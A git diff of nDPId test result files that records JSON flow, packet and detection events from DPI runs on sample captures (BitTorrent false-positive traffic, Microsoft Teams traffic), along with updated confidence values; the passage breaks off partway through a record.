~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 181 chars ~~ json string max len.......: 2143 chars diff --git a/test/results/targusdataspeed_false_positives.pcap.out b/test/results/targusdataspeed_false_positives.pcap.out new file mode 100644 index 000000000..c29ec712e --- /dev/null +++ b/test/results/targusdataspeed_false_positives.pcap.out @@ -0,0 +1,27 @@ +00482{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":35569,"flow_last_seen":35569,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":35569,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":35569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":35569,"pkt":"UlQAEjUCCAAn5uVZCABFAAB+ehEAAIARLTAKAAIPT6Q3e126E4kAahVHZDE6YWQyOmlkMjA69gJ3AZhiwRyVvvTzAO9QVrdoSnA2OnRhcmdldDIwOvYCdwGYYsEclb708wDvUFa3aEpxZTE6cTk6ZmluZF9ub2RlMTp0ODqI0o3DoQnQUDE6eTE6cWU="} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":35569,"flow_last_seen":35569,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":35569,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":35636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":35636,"pkt":"CAAn5uVZUlQAEjUCCABFAAEsIRMAAEARxYBPpDd7CgACDxOJXboBGPLZZDE6cmQyOmlkMjA68UwExRsq0lCIShWrmnwu+\/\/0D7o1Om5vZGVzMjA4OvYAw899hNamT5KlgR2oiHhyxzt01YhPzcLg9vgydcW8k4cv3Fr8tOeq+ypspa88fV\/qHx\/3l4TUEQlsHQ8kuklZu9SYGxxo3AW9vBe3U\/QuIpDY+J7KWxp01dUfUbcCXYWSXkiOpVN49GgveSTxM3cRnx3eRLH3ohcTJWfDmrMCp+L0oDemOnYZoghQIR1LsfeiLZ01ksOarKm8jfVq2pAMsKaNMS+nVbowDyKKXuuYPFaGCGdt9d\/0aGIls7MrEGZ+WwkinkejemJ2n2VYUxllMTp0ODqI0o3DoQnQUDE6eTE6cmU="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":46627,"flow_last_seen":46627,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":46627,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":46627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":46627,"pkt":"UlQAEjUCCAAn5uVZCABFAAB+wS0AAIAR5g8KAAIPWUAt4126FFEAas9YZDE6YWQyOmlkMjA69gJ3AZhiwRyVvvTzAO9QVrdoSnA2OnRhcmdldDIwOgn9iP5nnT7jakELDP8Qr6lIl7WOZTE6cTk6ZmluZF9ub2RlMTp0ODrKoRjdnOxydTE6eTE6cWU="} +00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":46627,"flow_last_seen":46627,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":46627,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":47351,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":345,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":345,"pkt_l4_len":311,"thread_ts_msec":47351,"pkt":"CAAn5uVZUlQAEjUCCABFAAFLPoUAAEARp+tZQC3jCgACDxRRXboBN3DOZDI6aXA2Ol0v4fi2NTE6cmQyOmlkMjA6Cixkc\/ArsXcJ7U3wslfTpV0++Qo1Om5vZGVzMjA4OgnoTWcn5Dz1WsC7MJGi19W6kHfXwIMsWf7sCMB+iYC28R+pvpNIPRWUbo8TACBttiU\/eIoJTCvSXHm7E6mVIW1xdJVtFGBxj71Fdbbh6Qi0O4aQ71PNaDpVSFMJBfrOkxEjUPl1HgURCYdIr0PZ+eaVADua7fVMXBTcQ4EChJrSdkcJ4hLhbiau6yJI+VuOfD+bIhmzz7V5SbNlNQhV3fqFlrrzSnPbqxOCr29KlotYDsDTJxC1CNuf8fG76euzpts8hww+mSReDZCIHta8ty8xOnBpNDY2NDVlZTE6dDg6yqEY3ZzscnUxOnY0OkxUAQIxOnkxOnJl"} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":46627,"flow_last_seen":47351,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":47351,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":35569,"flow_last_seen":35636,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":47351,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":771,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":47351} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 4/4 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 771 bytes +~~ total detected protocols..: 2 +~~ total active/idle flows...: 2/2 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6266469 bytes +~~ total memory freed........: 6266469 bytes +~~ total allocations/frees...: 120888/120888 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 487 chars +~~ json string max len.......: 853 chars +~~ json string avg len.......: 668 chars diff --git a/test/results/teams.pcap.out b/test/results/teams.pcap.out index bd2c1643b..6159981dc 100644 --- a/test/results/teams.pcap.out +++ b/test/results/teams.pcap.out @@ -2,7 +2,7 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587041672419} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587041672419,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041672419,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES1AAEARZ+TAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABgr52AAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -20,9 +20,9 @@ 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1587041675997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041675997,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPKfkAAP8RDk3AqAEGwKgBAe2NADUAO4czzp0BAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1587041676010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041676010,"pkt":"KDc3AG3IEBMx8Tl2CABFAABfTWlAADkRcM3AqAEBwKgBBgA17Y0ASwAAzp2BgAABAAEAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQABwAwAAQABAAAACQAENHJNIQ=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} @@ -31,29 +31,30 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 